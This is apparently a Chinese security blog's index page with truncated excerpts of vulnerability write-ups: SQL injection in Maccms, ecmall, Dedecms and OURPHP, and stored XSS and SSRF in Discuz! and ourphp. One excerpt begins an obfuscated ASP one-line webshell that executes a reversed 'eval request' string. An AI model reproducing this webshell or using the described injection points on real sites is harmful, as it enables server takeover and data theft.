详情参见 https://www.exploit-db.com/docs/38033.pdf
01月01日漏洞时代390 views评论com
function
discuz!有条件存储型xss和ssrf
文件source/function/function_discuzcode.phpfunction discuzcode 中跟踪 parsemedia跟踪 parseflv&nbs...
01月01日360 views评论function
params
Maccms V8 Sql Injection #1(有gpc限制)
ecmall 2.x通杀SQL注入漏洞分析及利用 附EXP
作者:Chora 漏洞文件app/buyer_groupbuy.app.php[php]function exit_group() { $id = empty($_GET['id'...
01月01日390 views评论app
php
Dedecms 会员中心注入漏洞6
[php][/php]调用的地方比较多 我就不一一写出了测试方法打开http://127.0.0.1/dede/member/soft_add.php
12月31日326 views评论function
php
发个一句话
最近有点事,博客没有经常更新。 今天发个一句话吧。 <% wei="日日日)""wei""(tseuqer lave 日" execute(UnEnc ode(wei)) f...
11月21日446 views评论cc
function
OURPHP V1.7.3(20170615) 前台SQL注入漏洞
密码随便填 登录后: 官网demo: 代码分析 问题出在过滤函数: ourphp/function/ourphp_function.class.php /*防注入函数*/ func...
05月19日631 views评论payload
sql
ourphp全版本有条件存储型XSS漏洞
问题出在 /function/ourphp_search.class.php 我们看到是对<> 进行了过滤,看似没有办法进行我们的xss,但是我们先看看输出点再说
05月19日572 views评论request
sql
15